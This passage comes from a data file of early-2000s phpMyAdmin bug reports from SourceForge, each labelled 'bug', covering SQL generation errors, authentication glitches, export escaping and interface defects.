when I select different table in the structure tab of the db, and then i choose in the combo box print view the comment column is empty but in table structure when i click print view the comment column appears with comments Original URL https sourceforge.net p phpmyadmin bugs 599 https sourceforge.net p phpmyadmin bugs 599 Original author mdelorme Found in version 2.3.1 rc1","bug"
"24444","6969","slash in comment.
when I add a comment with amp;quot;\ etc.
then the comment is store with a \ in front of those characters so the comment appears after with a \ that should not be there Original URL https sourceforge.net p phpmyadmin bugs 600 https sourceforge.net p phpmyadmin bugs 600 Original author mdelorme Found in version 2.3.1 rc1","bug"
"24444","6970","Query always show up after import.
After export a table and save as a file, when try to import it into MySQL database by specify amp;quot;Location of the textfile amp;quot; in SQL tab, even I CLEAR amp;quot;Show this query here again amp;quot; checkbox, the query string will still show up after successfully executed the difference is it will not fill in the textarea.
BUT the point is, when my exported table contains BLOB field, I may NOT want to see my query string at all.
And sometimes the exported file size is very large, if PHPMyAdmin insist to display the whole query, it my crash the browser.
So is there a way DO NOT display the SQL query at all after execute an INSERT statement?
Original URL https sourceforge.net p phpmyadmin bugs 601 https sourceforge.net p phpmyadmin bugs 601 Original author anonymous Found in version 2.3.1 rc1","bug"
"24444","6971","Edit Delete buttons on vertical view.
The edit delete buttons which appear in the normal horizontal) view when the sql is too long do NOT appear in the vertical view.
Original URL https sourceforge.net p phpmyadmin bugs 602 https sourceforge.net p phpmyadmin bugs 602 Original author gamenzie Found in version 2.3.1 rc1","bug"
"24444","6972","2.2.7 pl1) Cookie based auth problems.
I set phpMyAdmin 2.2.7 pl1 to authenticate via cookies and on submit it tried to send it to http index.php I checked to made sure was set cfgPmaAbsoluteUri it was.
I found the problem in libraries cookie.auth.lib.php and on line 96 there is amp;lt;base href= amp;quot; amp;lt;?php echo cfgPmaAbsoluteUri; ?
amp;gt; amp;quot; amp;gt; but cfgPmaAbsoluteUri isnt made global so it sets base href to nothing I changed it to amp;lt;base href= amp;quot; amp;lt;?php echo GLOBALS [ cfgPmaAbsoluteUri ]; ?
amp;gt; amp;quot; amp;gt; and the problem was solved.
AZTEK Original URL https sourceforge.net p phpmyadmin bugs 603 https sourceforge.net p phpmyadmin bugs 603 Original author azopteks Found in version 2.2.7 pl1","bug"
"24444","6973","Unmodifiable field if name =\\0.
There s a bug when you enter \0 in a field then, you are unable to delete modif the field Original URL https sourceforge.net p phpmyadmin bugs 604 https sourceforge.net p phpmyadmin bugs 604 Original author anonymous Found in version 2.2.4","bug"
"24444","6974","2.3.1 rc1)ALTER TABLE missing spacebar.
Hi.
when you alter a column via the table structure window, e.g.
changing the column type, the executed query is displayed very colorfully afterwards.
But if the changed column is UNSIGNED and has a DEFAULT value at a time, those two words are NOT seperated by a space bar in the amp;quot;colorful line amp;quot;.
Thus copying and executing the query leads to an SQL syntax error, of course.
I suppose adding a space bar here is a pretty easy job for you ) Goodbye, and keep on your good work!
Fred Original URL https sourceforge.net p phpmyadmin bugs 605 https sourceforge.net p phpmyadmin bugs 605 Original author fwenzel Found in version 2.3.1 rc1","bug"
"24444","6975","2.3.1 rc1) port configuration being ignored.
I am using phpMyAdmin 2.3.1 rc1 and have a problem where the port config variable is not being used.
I have set cfg[ Servers ][ i][ port ] to port 80 for all three locations and phpMyAdmin still connects to the MySQL server.
Despite the server being located at 3306 as is the default).
I m assuming this is not the default behavior and so I am reporting it.
If I am incorrect and it should work, please delete this bug report.
One note however.
Once I log in, the server list shows localhost 80 for the server I m connected and all three servers that are set up in the dropdown where I can select other servers.
So it appears that the variable is being read, just not being used for the connection to the MySQL server.
Charlie Original URL https sourceforge.net p phpmyadmin bugs 606 https sourceforge.net p phpmyadmin bugs 606 Original author clehardy","bug"
"24444","6976","2.3.1 rc1) IE 5.5 or 6, and http authentication.
Browser IE 5.5 phpmyadmin 2.3.1 rc I have phpmyadmin set up to user http authentication on two mysql servers configured in config.inc.php.
The issue arises when I switch from the first server to the second server then back to the first server.
At that point phpmyadmin asks for the user password at every operation, selecting amp;quot;remember password amp;quot; is ineffective.
I can switch back to the second server remote mysql) and have no problems, however the problem persists on the first server localhost).
The problem goes away if I restart IE until I again switch to the second server.
Original URL https sourceforge.net p phpmyadmin bugs 607 https sourceforge.net p phpmyadmin bugs 607 Original author anonymous Found in version 2.3.1 rc1","bug"
"24444","6977","2.3.1 rc1) Duplicate args in table tabs links.
Hi!
It table tabs links, amp;quot;goto amp;quot; and back amp;quot; arguments are duplicated!
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 608 https sourceforge.net p phpmyadmin bugs 608 Original author loic1 Found in version 2.3.1 rc1","bug"
"24444","6978","Text file upload may fail PHP 4.2.3.
I have discovered that in version 4.2.3 of PHP and maybe some slightly older versions, the text file upload may not work correctly in phpMyAdmin.
If MySQL is configured to not run as root i.e.
run under mysql ), then text file uploads into MySQL will fail.
The new version of PHP has modified the permissions on HTTP file uploads so that the user apache or whatever the web server runs as only has access permission to this upload file and no one else.
This causes a permissions error to be displayed by MySQL.
I have modified the `ldi check.php` file and put chmod textfile, 0644); before phpMyAdmin executes the MySQL LOAD command.
I wasn t sure if this problem has been addressed.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 609 https sourceforge.net p phpmyadmin bugs 609 Original author anonymous Found in version 2.2.3","bug"
"24444","6979","2.3.1 rc1) config.inc.php has missing variables.
In version 2.3.1 rc1 In the config.inc.php file there are some variables no longer being set as they were before all cfg[ SQLQuery ]... and cfg[ UploadDir ] It s as if they were accidently erased from the script.
I downloaded a fresh copy to make sure it wasn t just at my end.
I m not sure of the SQLQuery ones but the UploadDir variable is used in the script and if I don t set it, it defaults to upload .
Because I don t have an upload file it gives me an error each time reading amp;quot;The directory you set for upload work cannot be reached amp;quot;.
It s just a matter of putting that variable back into the config.inc.php file.
As a thought, seeing many of us do not use upload directories, can this be made that if it is not set rather than defaulting to upload and thus no checks are made thus no errors.
I haven t noticed any errors caused by it not being there but they are true or false values so may never show up.
Original URL https sourceforge.net p phpmyadmin bugs 610 https sourceforge.net p phpmyadmin bugs 610 Original author jjcarlson Found in version 2.3.1 rc1","bug"
"24444","6980","Numeric Field Names problem.
I m using this type of select, generated by an automatic php program.
The program use a DESCRIBE TABLE to mount this structure SELECT table1.id, table1.name, 1 FROM table1, table2 WHERE table1.insert date amp;lt;= 2002 02 28 AND table1.id=table2.id theres a parameters used 1 at end of list fields.
The result in mysqladmin is id name 1 1 2 1 3 1 4 1 but the correct without the amp;quot;1 amp;quot; parameter is id name 1 peter 2 phenix 3 mister bigu 4 marcus when I use the select in a php program the result is correct too.
Thanks for helping dbx ig.com.br Original URL https sourceforge.net p phpmyadmin bugs 611 https sourceforge.net p phpmyadmin bugs 611 Original author anonymous Found in version 2.3.1","bug"
"24444","6981","2.3.0) fieldname mutilation PHP 4.2.3 bug).
Hello, I m having a rather bizarre problem with phpMyAdmin tried several versions, but currently using 2.3.0) on a RedHat 7.3 kernel 2.4.18) server running Apache 1.3.26 and PHP v2.2.3 with many things compiled in ; ) and MySQL server version 3.23.49.
I looked though the bug s database and found nothing similar, so here goes Firstly I create a database named amp;quot;test amp;quot;, that works fine; within this db I attempt to create a table called amp;quot;test amp;quot;, with an INT auto increment primary field called amp;quot;test 1 amp;quot;, and a varchar 255) NULL field named amp;quot;test 2 amp;quot;.
see screenshot here http extaci.com phpmyadmin bug moz create table 1.jpg 30kb ) And then I get this error cut Database test table test running on localhost Error SQL query CREATE TABLE `test` ` 1` INT NULL INCREMENT, ` 2` HAR 255 ) , PRIMARY KEY ` 1` ) ) MySQL said You have an error in your SQL syntax near INCREMENT, ` 2` HAR 255), PRIMARY KEY ` 1`)) at line 1 Back cut You can see from the above that the field names from the forms are getting truncated, and so amp;quot;test 1 amp;quot; becomes amp;quot; 1 amp;quot; and amp;quot;test 2 amp;quot; becomes amp;quot; 2 amp;quot; for some reason.
I get exactly the same problem when trying to insert a row into an existing table, however obviously the query works from the mysql console.
Evidently the problem lies in phpMyAdmin or my new version of PHP v2.2.3 ) as I did not have the same problem from my older version of PHP which was compiled in roughly the same fashion unfortunately, I can not revert to the old version of PHP, my current work depends on a reccent fix in PHP).
You can see the phpinfo ) page here http extaci.com phpmyadmin bug phpinfo.html Can anyone have any idea what this could be?
Using mysql from the console is irritating as heck!
Help!!!!!
Cheers, Rob Original URL https sourceforge.net p phpmyadmin bugs 613 https sourceforge.net p phpmyadmin bugs 613 Original author rmthawanji","bug"
"24444","6982","2.3.1 rc1) error in column naming.
When i tried to rename column one) 1 to zero one) 01 phpmyadmin resulted with query ALTER TABLE `users` CHANGE `1` `1` INT 11 ) DEFAULT 0 NOT NULL ; I wanted 01 not 1.
Column was not renamed.
I tried manuall ALTER TABLE `users` CHANGE `1` `01` INT 11 ) DEFAULT 0 NOT NULL ; and it worked!
The same thing goes when creating column named 0 Original URL https sourceforge.net p phpmyadmin bugs 612 https sourceforge.net p phpmyadmin bugs 612 Original author anonymous Found in version 2.3.1 rc1","bug"
"24444","6983","Import of large csv.
Import of n csv 1,4MB 2.000rows) fails.
Importing of 4 parts with 500 rows works.
???
Original URL https sourceforge.net p phpmyadmin bugs 614 https sourceforge.net p phpmyadmin bugs 614 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6984","2.3.1) Changing field properties length, enums...).
I noticed the following problem when you try to change a column type from INT 8) to DOUBLE 8,2) for example PHPMyAdmin 2.3.1 either does not generate the proper SQL statement but this ALTER TABLE `job hours` CHANGE `hours` `hours` DOUBLE 8 ) UNSIGNED DEFAULT 0 NOT NULL; or it generates a SQL statement like this ALTER TABLE `job hours` CHANGE `hours` `hours` DOUBLE UNSIGNED DEFAULT 0 NOT NULL; Genarally v. 2.3.1 does not seem to be able to handle this column type at all.
I think that v. 2.3.0 was OK.
Original URL https sourceforge.net p phpmyadmin bugs 615 https sourceforge.net p phpmyadmin bugs 615 Original author anonymous Found in version 2.3.1","bug"
"24444","6985","2.3.1) tabindex for linked fields.
when i am in edit mode to add or edit a record, when a field is link to another thanks to relation tables.
then the tab index field is the last one and not the good one Original URL https sourceforge.net p phpmyadmin bugs 616 https sourceforge.net p phpmyadmin bugs 616 Original author mdelorme Found in version 2.3.1 rc1","bug"
"24444","6986","2.3.3 rc1) relation and GROUP BY or alias AS).
The problem described at https sourceforge.net tracker index.php?func=detail amp;amp;aid=574852 amp;amp;group id=23067 amp;amp;atid=377408 is solved Thanks!)
but there are some other problems with it like a GROUP BY on a relation field or an alias AS ).
Original URL https sourceforge.net p phpmyadmin bugs 617 https sourceforge.net p phpmyadmin bugs 617 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","6987","2.3.1) Cookie auth refuses blank password.
The cookie auth method doesn t work with a blank password.
Yes, I know, it is not recommended to use leave accounts with blank passwords, but the initial root password is blank.
This happens because setcookie ) deletes the cookie if the second parameter is an empty string.
I ve attached my solution along this bug report.
Use it if you want.
It uses an special string if a blank password is given.
Original URL https sourceforge.net p phpmyadmin bugs 618 https sourceforge.net p phpmyadmin bugs 618 Original author jferraz Found in version 2.3.1","bug"
"24444","6988","2.3.3 rc1) ORDER BY SUM var) COUNT ).
When displaying a table, pma gives the option to sort after a certain column.
If a column is COUNT ) or SUM var) and you click on it, it will be sorted ASC but if you click it again it still will be sorted ASC i.e.
it s not possible to let it sort DESC.
Original URL https sourceforge.net p phpmyadmin bugs 619 https sourceforge.net p phpmyadmin bugs 619 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","6989","2.3.3 rc1) relation and non primary keys.
I created a relation directly in the PMA relation table as it is not possible to create this relation using pma because the amp;quot;detail amp;quot; key is not the primary one.
This all is okay.
The bug is that if you select relation view on the structure tab that manual created relation link will not show up it will be shown as meaning that there is no relation defined for that field.
pma seems just to recognize amp;quot;valid amp;quot; relation links, i.e.
links that can be created using pma.
Original URL https sourceforge.net p phpmyadmin bugs 620 https sourceforge.net p phpmyadmin bugs 620 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","6990","2.3.2) Security Leak.
Hi!
From the amp;quot;Open discussion amp;quot; forum If my MySQL server is down or not responding, phpMyAdmin shows error like here There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Invalid Identifer 15 STR 194.44.
SQL mysql connect 194.44. .
, db user, secret password) so password from CONFIG is shown public!
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 624 https sourceforge.net p phpmyadmin bugs 624 Original author loic1 Found in version 2.3.2","bug"
"24444","6991","2.3.1) Display broken because of HTML in DB.. myPhpAdmin 2.3.1 php3 PHP 4.0.6 MySQL 3.23.39 Apache 1.3.12 Windows 98 1) When browsing tables that contain HTML code phpMyAdmin s display breaks.
It seems table contents are not HTML quoted... 2) Furthermore when trying to modify a row with long 400 bytes) HTML content button amp;quot;modify amp;quot;, same view) the sql query fails, because it is truncated SELECT FROM `products content` WHERE `product id` = 1005 AND `language` = de AND `content` = amp;lt; lacks a quotation sign and the content itself 3) Finally it can be noted that in the case of long HTML content the amp;quot;browse amp;quot; button is a submit button instead of a simple link a href).
Thanks for this great program Original URL https sourceforge.net p phpmyadmin bugs 621 https sourceforge.net p phpmyadmin bugs 621 Original author steveman Found in version 2.3.1","bug"
"24444","6992","2.3.1 rc1) Missing characters at insert.
OS Linux RedHat 7.2 PHP 4.2.3 Apache 1.3.27 MySQL 3.23.29 Internet Explorer 6.0 I use insert page.
I have to insert a text like amp;quot;[ t i m p u l l i b e r l a d i s c r e t i a ta ] amp;quot; the first 4 characters from every input form are cut.
I actualy insert only amp;quot;i m p u l l i b e r l a d i s c r e t i a ta ] amp;quot; And the same is for any input test after this one.
And there are always 4 characters missing.
I tryed the same on phpMyAdmin 2.2.7 pl1 and it s fine.
Thanks.
Constantin Original URL https sourceforge.net p phpmyadmin bugs 622 https sourceforge.net p phpmyadmin bugs 622 Original author anonymous Found in version 2.3.1 rc1","bug"
"24444","6993","2.3.1) sql file upload failed.
On my system W2K SP 3 IIS PHP 4.2.3) executing an SQL script from an external file failed with the folowing message No SQL query!
Runing the same query from the edit box is working fine.
Original URL https sourceforge.net p phpmyadmin bugs 623 https sourceforge.net p phpmyadmin bugs 623 Original author anonymous Found in version 2.3.1","bug"
"24444","6994","2.3.2) Incorrect URL.
As I go to add an index, there s a link to amp;quot;documentation.
amp;quot; The url there is incorrect http www.mysql.com doc en ALTER TABLE.html.html Has an extra .html at the end.
Original URL https sourceforge.net p phpmyadmin bugs 625 https sourceforge.net p phpmyadmin bugs 625 Original author anonymous Found in version 2.3.2","bug"
"24444","6995","2.3.2) Error in Sql Query.
Hi all, When you launch SQL the Sql Query contain error set are not space after field SQL query [Edit] [Create PHP Code] UPDATE mytable setmyfield = 1 Original URL https sourceforge.net p phpmyadmin bugs 626 https sourceforge.net p phpmyadmin bugs 626 Original author anonymous Found in version 2.3.2","bug"
"24444","6996","2.3.0) Wrong Changes in Queries.
If I have a query like select myfield from my table where where id= 1 phpMyAdmin changes the query to SELECT myfield FROM my table WHERE WHERE id= 1 It does it allways if a table field ends with a reserved word and is separated by the underscore.
Original URL https sourceforge.net p phpmyadmin bugs 627 https sourceforge.net p phpmyadmin bugs 627 Original author hdonner Found in version 2.3.0","bug"
"24444","6997","Mac OS X, PHP 4.2.3 and quot;Empty quot; table.
Using the amp;quot;Empty amp;quot; table feature to delete all of the contents of a table causes seemingly random problems with MySQL queries thereafter; whether through direct SQL entry or through mysql query ); in PHP For example, insert queries that do not write the data to the database but do not report an error.
In the case of performing manul queries, PHPMyAdmin mistakenly reports that the insert was performed sucessfully, when in reality, it hasn t. This error happens equally on tables whether there is a primary key and or auto increment key or not.
Workaround Manually issuing a amp;quot;DELETE FROM tbl name amp;quot; SQL query instead of using the amp;quot;Empty amp;quot; does NOT cause problems and works as expected.
Dropping the affected tables and recreating them also fixes the problem.
Original URL https sourceforge.net p phpmyadmin bugs 628 https sourceforge.net p phpmyadmin bugs 628 Original author anonymous","bug"
"24444","6998","2.3.3 dev) Ordering by FUNCTION `field`) fails.
Server Windows NT 5.2 RC1 Apache 2.0.43 or IIS 6.0 PHP 4.3.0 dev MySQL 4.0.4 beta phpMyAdmin 2.3.3 dev Yeah, it s my beta machine!
;o) ) Take a simple query like SELECT `my foreign key`, COUNT `id`) FROM `my table` GROUP BY `my foreign key`; The result of the query is displayed correctly, but when trying to order the result by the COUNT field the user runs into a MySQL error.
The problem is, that phpMyAdmin appends the following string ORDER BY `COUNT `id`)` ASC This won t work because the column name already contains backquotes, so it cannot be enclosed in backquotes!
Original URL https sourceforge.net p phpmyadmin bugs 629 https sourceforge.net p phpmyadmin bugs 629 Original author rabus Found in version 2.3.2","bug"
"24444","6999","2.3.2) Backslash n missing in mysql query.
If you have a row with a TEXT column, where there are line breaks, the mysql query isn t correctly formulated when you for example perform amp;quot;delete amp;quot;, or any other action.
Therefore, it s not possible to use the web interface to perform such actions, you ll have to form you re own query, which can be quite tedious.
Original URL https sourceforge.net p phpmyadmin bugs 630 https sourceforge.net p phpmyadmin bugs 630 Original author hakon g Found in version 2.3.2","bug"
"24444","7000","PDF pages same width tables.
I played around a bit with this really nice feature, but noticed a small bug When using display all tables with same width the connections on the right side of the boxes are actually behind the boxes.
Original URL https sourceforge.net p phpmyadmin bugs 631 https sourceforge.net p phpmyadmin bugs 631 Original author ci dev Found in version Latest Git","bug"
"24444","7001","2.3.2) Export bug?.
I just exported a MySQL database today.
I had a table named group but phpmyadmin 2.3.2) seemed to forget to escape the table name, so it wrote in the export INSERT INTO group ... instead of INSERT INTO `group` Original URL https sourceforge.net p phpmyadmin bugs 635 https sourceforge.net p phpmyadmin bugs 635 Original author anonymous Found in version 2.3.2","bug"
"24444","7002","2.3.2) Javascript bug in setPointer ) function.
After porting your Javascript setPointer ) function from libraries functions.js) to an application of my own I found a slight bug.
Though it will not likely affect the PhpMyAdmin application I thought you might want to address it anyways.
In the section 4.1) that sets the new row color the following code should be changed ... from ... 4.
Defines the new color 4.1 Current color is the default one if currentColor == || currentColor.toLowerCase ) == theDefaultColor.toLowerCase )) \{ if theAction == over amp;amp; amp;amp; thePointerColor != ) \{ newColor = thePointerColor; \} else if theAction == click amp;amp; amp;amp; theMarkColor != ) \{ newColor = theMarkColor; \} \} ... to ... NEW CODE 4.
Defines the new color 4.1 Current color is the default one if currentColor == || currentColor.toLowerCase ) == theDefaultColor.toLowerCase )) \{ if theAction == over amp;amp; amp;amp; thePointerColor != ) \{ newColor = thePointerColor; \} else if theAction == click amp;amp; amp;amp; theMarkColor != ) \{ newColor = theMarkColor; NEW LINE v marked row[theRowNum] = true; \} \} The reason is that if setPointer ) is called from another function i.e.
to set default highlited rows using document.onLoad )) the marked row array needs to be updated in order to ensure that the row color is changed back properly.
Otherwise, the row will remain colored with the value of thePointerColor variable despite repeated calls to setPointer ).
Original URL https sourceforge.net p phpmyadmin bugs 636 https sourceforge.net p phpmyadmin bugs 636 Original author xangelusx Found in version 2.3.2","bug"
"24444","7003","Text expand not working.... Hi there...
I m using phpmyadmin 2.3.1 rc1.
It seems there s a little flaw in text expansion Using browse mode on a table with a text column.
Date is shown amp;quot;truncated amp;quot; initially.
The amp;quot;big button amp;quot; with the T and two arrows outwards amp;quot;full texts amp;quot;) points to url with last parameter ...dontlimitchars=0...
Thus, nothing will happpen.
Text will not be expanded).
If you change the url manually copy link address, modify in browser) and set amp;quot;dontlimitchars=1 amp;quot; you get the correct display, but the resulting page has a button which then doesn t amp;quot;shrink amp;quot; the text anymore target url with amp;quot;dontlimitchars=1 amp;quot; ) ..
It seem this flip flop is just the wrong way roung, know what I mean ?
Where can I fix this ?
Thanx, Matt Original URL https sourceforge.net p phpmyadmin bugs 632 https sourceforge.net p phpmyadmin bugs 632 Original author anonymous","bug"
"24444","7004","2.3.2) amp;quot;date amp;quot; columns wrap in browse mode IE6).
PMA 2.3.1 rc1 Apache 1.3.24 MySqL 3.23.37 Browser IE6 6.0.2600) Contents of date columns sometimes wrap in the display.
Have appended two sample tables as import SQL Insert).
with FTTMARB, watch columns EINSTDAT and GEBDAT on either horizontal or vertical display.
with FTTPAKT, error occurs for vertical display only last two columns of table, AKTSDAT and AKTEDAT).
your help is appreciated .. Matt Original URL https sourceforge.net p phpmyadmin bugs 633 https sourceforge.net p phpmyadmin bugs 633 Original author anonymous Found in version 2.3.2","bug"
"24444","7005","2.3.2) FontFamily.
Sergey Litovchenko wrote to me [..skipped..] My English is poor and I m afraid I will not be understood.
[..skipped..] Trying the latest version of phpMyAdmin I encountered a bug while generating a PDF file, namely amp;quot;Font is not set amp;quot;.
As far as I understand, this bug is in fpdf.php module, in a method of SetFont class.
Variable family font type) remains uninitialized in any case, since FontFamily is not global for this method.
[..skipped..] Artyom Rabzonov Original URL https sourceforge.net p phpmyadmin bugs 634 https sourceforge.net p phpmyadmin bugs 634 Original author tyomych Found in version 2.3.2","bug"
"24444","7006","2.3.2) Check All produces script error in IE6.
The check all and uncheck all links in a database view db details structure.php) produce script errors in IE6.
The error is as follows document.forms[...].elements is null or not an object.
Line 430.
Presumably in functions.js) PHP Version 4.0.6 IE Version 6.0.2800.1106.xpsp1.020828 1920 SP1) Hope this helps!
Original URL https sourceforge.net p phpmyadmin bugs 637 https sourceforge.net p phpmyadmin bugs 637 Original author anonymous Found in version 2.3.2","bug"
"24444","7007","2.3.2) primary key with auto increment key.
OS Mac OSX v10.2.1 Apache 1.3.26 Darwin PHP 2.3.2 As Apache DSO) MySQL 3.23.52 When creating a table that contained one MEDIUMINT auto index UNIQUE key followed by a VARCHAR BINARY PRIMARY key, I get an error from phpMyAdmin saying amp;quot;Multiple primary key defined amp;quot;.
But, if I switch the order on which these fields are created, it works!
See attached .pdf file for screenshot) For an additional example, if I use the SQL statement CREATE TABLE user usernumber MEDIUMINT 10) DEFAULT 0 NOT NULL AUTO INCREMENT, userid VARCHAR 8) BINARY NOT NULL, userpassword VARCHAR 20) BINARY NOT NULL, username VARCHAR 30) NOT NULL, usercountry VARCHAR 50) NOT NULL, useremail VARCHAR 50) NOT NULL, userprofile TEXT NOT NULL, registerdate DATE DEFAULT 0000 00 00 NOT NULL, lastaccesstime TIMESTAMP 14), PRIMARY KEY userid), UNIQUE usernumber usernumber) ); To create the table it works!
If I use phpMyAdmin to create the table with the fields in the order shown, it fails with the amp;quot;Multiple primary key amp;quot; problem, but again, if I switch the order of the key definition, it seems to work fine?
Bug, or feature?
Original URL https sourceforge.net p phpmyadmin bugs 642 https sourceforge.net p phpmyadmin bugs 642 Original author anonymous Found in version 2.3.2","bug"
"24444","7008","2.3.2) Strip lines beginning with hyphen please.
Our company makes available to clients our database in multiple formats, one is a straight mysqldump text file.
One of our new clients emailed to say the dump was invalid.
Upon checking, it seems he was using phpmyadmin s SQL load text file form.
This coughs on the fact that the file has comments beginning with hyphens.
It would seem strange that you don t strip hyphens from the beginning of strings if you re outside an SQL statement.
Any reason not to?
If so, perhaps a separate amp;quot;load mysqldump file amp;quot; option should be given.
Please consider this both a bug in case it was supposed to work, and a feature request otherwise.
I can be reached at james stealthnet.co.uk.
Many thanks, James Green Original URL https sourceforge.net p phpmyadmin bugs 638 https sourceforge.net p phpmyadmin bugs 638 Original author anonymous Found in version 2.3.2","bug"
"24444","7009","2.3.2) Check referential integrity and NULL foreign key.
Foreing key field can be NULL 0 to N relation) so the condition should be amp;quot; amp;lt;master table amp;gt;.
amp;lt;primary key field amp;gt; is null and amp;lt;details table amp;gt;.
amp;lt;foreing key name amp;gt; is not null amp;quot;.
Original URL https sourceforge.net p phpmyadmin bugs 639 https sourceforge.net p phpmyadmin bugs 639 Original author anonymous Found in version 2.3.2","bug"
"24444","7010","2.3.2) unable to parse url.
When I click browse to view the contents of a table that has a cell that contains a LONGTEXT or LONGBLOB) field that has a text of size more than 8000 chars, I get the following error Warning unable to parse url sql.php?lang=\{...\} in home saxtus web saxtus gamidia phpMyAdmin librari es display tbl.lib.php on line 739 where \{...\} has some switches and the contents of the big cell.
I have PHP 4.0.6 and I am unable to reproduce it on your test server http phpmyadmin.sourceforge.net phpMyAdmin that has PHP 4.1.2 Is this a bug of phpMyAdmin or PHP 4.0.6 problem i.e.
has to do with the buggy str replace ) function)?
Thank you.
Original URL https sourceforge.net p phpmyadmin bugs 645 https sourceforge.net p phpmyadmin bugs 645 Original author saxtus Found in version 2.3.2","bug"
"24444","7011","2.3.2) Check referential integrity and self linked table.
Table can be linked with itself ex.
tree node can link to parent node in the table) but when checking integrity of the table SQL error occurs.
Original URL https sourceforge.net p phpmyadmin bugs 640 https sourceforge.net p phpmyadmin bugs 640 Original author anonymous Found in version 2.3.2","bug"
"24444","7012","2.3.0 rc4) Bug in the SQL parser?.
I seem to have found a bug in the SQL parser.
Data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAwMi8wNy8 yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDE3MSAxN zIgMjMwPGJyIC8 CkxlZnRvdmVy OiDxPGJyIC8 CkE6IDE3MSAxNzI8YnIgLz4KU1FMOiBDUkVBV EUgVEFCTEUgZGlhbGlzaXNfY3Vy c28gKCBmb3JtdWxhcmlvIGludCBOT1QgTlVMTCBkZWZhdWx0I CcwJywgY3Vyc28gdmFyY2hhciAo MTAwKSBkZWZhdWx0IE5VTEwgLCBmaW5hbCB0aW55aW50I GRlZmF1bHQgTlVMTCAsIG9yZ2FuaXph ZG8gdmFyY2hhciAoNTApIGRlZmF1bHQgTlVMTCAsIGHxb2Mg aW50IGRlZmF1bHQgTlVMTCAsIGhv cmFzIGludCBkZWZhdWx0IE5VTEwgKSBUWVBFPU15SVNBTQ == END CUT Original URL https sourceforge.net p phpmyadmin bugs 641 https sourceforge.net p phpmyadmin bugs 641 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","7013","2.3.2) amp;quot;table amp;quot; capitalized in table name patch).
From an user in the amp;quot;help amp;quot; forum Because of compatibility reasons, I have to have some tables named amp;quot;family table amp;quot;, etc..
When I try to delete a record or sort a field in phpMyAdmin, it gives me an error like begin output SELECT FROM `family TABLE ` ORDER BY ` FamilyID` ASC LIMIT 0, 30 MySQL said Table fai07.family TABLE doesn t exist end output It appears that whatever corrects the case in the query is capitalizing the wrong thing.
I ve tried to create the table amp;quot;family table amp;quot; with the current CVS version and what is created is the amp;quot;family TABLE amp;quot; table Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 643 https sourceforge.net p phpmyadmin bugs 643 Original author loic1 Found in version 2.3.2","bug"
"24444","7014","2.3.2) wrong sql dump if colname=reserved word.
I have colum with name grant which is reserved word if I take care, then everything is OK).
But if I use phpMyAdmin and his function SQL dump, then the result is ... grant enum N , Y ) NOT NULL default Y , ... and should be ... `grant` enum N , Y ) NOT NULL default Y , ... Miroslav Suchy Original URL https sourceforge.net p phpmyadmin bugs 649 https sourceforge.net p phpmyadmin bugs 649 Original author mireksuchy Found in version 2.3.2","bug"
"24444","7015","repeated SQL statements PHP 4.2.3).
This may not be a phpmyadmin bug, but what could it be?
With PHP4.2.3 MySQL4.0.4b Apache2.0.42 on Win2000 I now get errors while executing almost any SQL function like creating tables etc because the statements get duplicated like this CREATE TABLE `foo` `bar` TINYINT NOT NULL , `baz` VARCHAR NOT NULL , `bar` TINYINT NOT NULL , `baz` VARCHAR NOT NULL ) Ixc2xb4ve tried a few old versions of phpmyadmin and the same thing happens.
Everything else on the server seems to work fine.
Any clue?
regards, Maximilian Original URL https sourceforge.net p phpmyadmin bugs 644 https sourceforge.net p phpmyadmin bugs 644 Original author maxxximilian","bug"
"24444","7016","2.3.3 dev) Export fails with UTF 8!.
As I tried to dump some tables of a DB to an .sql file using the German UTF 8 lang file, I get the following error Notice iconv ) Wrong charset, cannot convert from `iso 8859 1 to `iso8859 1 in [pma dir] libraries charset conversion.lib.php3 on line 275 And it does not matter, what charset I selected for the dump file, the error message is always EXACTLY the same.
Original URL https sourceforge.net p phpmyadmin bugs 646 https sourceforge.net p phpmyadmin bugs 646 Original author rabus Found in version 2.3.2","bug"
"24444","7017","2.3.2) Inconsistent use of radio buttons.
The search results page uses radio buttons as submit buttons amp;quot;Browse amp;quot; and amp;quot;Delete amp;quot;).
These should be replaced with real submit buttons, because radio buttons are used for selecting values in a form, not for sending data to server.
Apple s amp;quot;Aqua Human Interface Guidelines amp;quot; says this about radio buttons amp;quot;Use radio buttons for a set of mutually exclusive, but related, choices.
A set of radio buttons should contain at least two items and a maximum of about seven.
For more than seven items, consider using a pop up menu.)
A set of radio buttons is never dynamic changing contents depending on the context).
A radio button should never initiate an action.
amp;quot; I didn t test it, but the current version probably requires JavaScript to be enabled.
Original URL https sourceforge.net p phpmyadmin bugs 651 https sourceforge.net p phpmyadmin bugs 651 Original author visa Found in version 2.3.2","bug"
"24444","7018","2.3.2) DROP tab too prominent in UI.
After selecting a couple of test tables that I had just created, I clicked on the big red DROP tab to remove the test tables, only to find to my horror that it was DROP DATABASE!
Perhaps DROP should not be highlighted in red, or moved somewhere more obscure.
This was in phpMyAdmin 2.3.2.
I have been using phpMyAdmin 2.2.5 previously.
Original URL https sourceforge.net p phpmyadmin bugs 647 https sourceforge.net p phpmyadmin bugs 647 Original author anonymous Found in version 2.3.2","bug"
"24444","7019","2.3.3 dev) JS error in data dictonary.
When selecting the data dictonary, I recieve a JS error Row 2132 Character 1 expected amp;quot;\} amp;quot; I m using MSIE 6 SP1 Original URL https sourceforge.net p phpmyadmin bugs 648 https sourceforge.net p phpmyadmin bugs 648 Original author rabus Found in version 2.3.2","bug"
"24444","7020","2.3.2) Create Alter Table Inconsistancy.
Just an inconsistancty I noticed.
